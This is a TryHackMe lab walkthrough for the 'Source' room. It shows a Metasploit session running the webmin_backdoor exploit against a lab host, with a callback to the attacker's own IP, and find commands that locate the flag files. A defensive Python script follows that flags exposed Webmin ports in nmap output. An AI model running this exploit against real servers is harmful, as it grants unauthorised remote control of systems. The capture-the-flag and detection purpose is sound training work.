Source Walkthrough (TryHackMe)
Well, the room hasn't given us much except an IP.
1. Run an nmap scan against the target IP:
The results don't seem very helpful, but the service running on port 10000 might give us something.
2. Fire up msfconsole and search for webmin
Now, the second exploit seems useful.
msf5 > use 2
msf5 exploit(linux/http/webmin_backdoor) > show options
Now set RHOST and LHOST.
msf5 exploit(linux/http/webmin_backdoor) > set RHOST 10.10.236.242
RHOST => 10.10.236.242
To set LHOST, we need our tun0 IP.
msf5 exploit(linux/http/webmin_backdoor) > set LHOST 10.9.159.4
LHOST => 10.9.159.4
msf5 exploit(linux/http/webmin_backdoor) > run
But it shows an error.
So let's enable the SSL option too.
msf5 exploit(linux/http/webmin_backdoor) > set SSL true
[!] Changing the SSL option's value may require changing RPORT!
SSL => true
3. Now look for the files that contain the flags.
find / -type f -name "user.txt"
Now, if you cat this file, you will see the flag.
Do the same for the other file as well:
find / -type f -name "root.txt"
Good Luck!
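From the defender's side, the nmap result in step 1 is the finding that matters: a Webmin admin interface reachable on port 10000. The following added example (not part of the original walkthrough) parses nmap's grepable output (`-oG`) from a scan of your own hosts and flags open Webmin listeners; the sample scan text, the two extra host addresses and the function names are constructed for illustration.

```python
import re

# Constructed sample of `nmap -sV -oG -` output; not taken from the walkthrough.
SAMPLE_GNMAP = (
    "# Nmap scan (constructed sample)\n"
    "Host: 10.10.236.242 ()\tStatus: Up\n"
    "Host: 10.10.236.242 ()\tPorts: 22/open/tcp//ssh//OpenSSH/, "
    "10000/open/tcp//http//MiniServ (Webmin httpd)/\tIgnored State: closed (998)\n"
    "Host: 10.10.0.7 ()\tPorts: 80/open/tcp//http//nginx/, "
    "10000/filtered/tcp//snet-sensor-mgmt///\n"
    "Host: 10.10.0.9 ()\tPorts: 10000/open/tcp//tcpwrapped///\n"
)

WEBMIN_HINT = re.compile(r"webmin|miniserv", re.IGNORECASE)


def parse_gnmap(text):
    """Yield (host, port, state, service, version) for each port entry."""
    for line in text.splitlines():
        if not line.startswith("Host:") or "\tPorts: " not in line:
            continue  # skip comments and "Status:" lines
        fields = line.split("\t")
        host = fields[0].split()[1]
        ports = next(f for f in fields if f.startswith("Ports: "))[len("Ports: "):]
        # Entries look like port/state/proto/owner/service/rpcinfo/version/
        for entry in ports.split(", "):
            parts = entry.strip().split("/")
            if len(parts) < 7:
                continue  # malformed or truncated entry
            port, state, _proto, _owner, service, _rpc, version = parts[:7]
            yield host, int(port), state, service, version


def exposed_webmin(text):
    """Return (host, port, reason) for open ports that look like Webmin."""
    findings = []
    for host, port, state, service, version in parse_gnmap(text):
        if state != "open":
            continue  # filtered/closed ports are not reachable
        if WEBMIN_HINT.search(service + " " + version):
            findings.append((host, port, "webmin-banner"))
        elif port == 10000:
            # Webmin's default port, but nmap could not identify the service.
            findings.append((host, port, "default-port-unidentified"))
    return findings


if __name__ == "__main__":
    for finding in exposed_webmin(SAMPLE_GNMAP):
        print(finding)
```

Any host this reports should have its management port restricted to an admin network and its Webmin package checked against the vendor's current release.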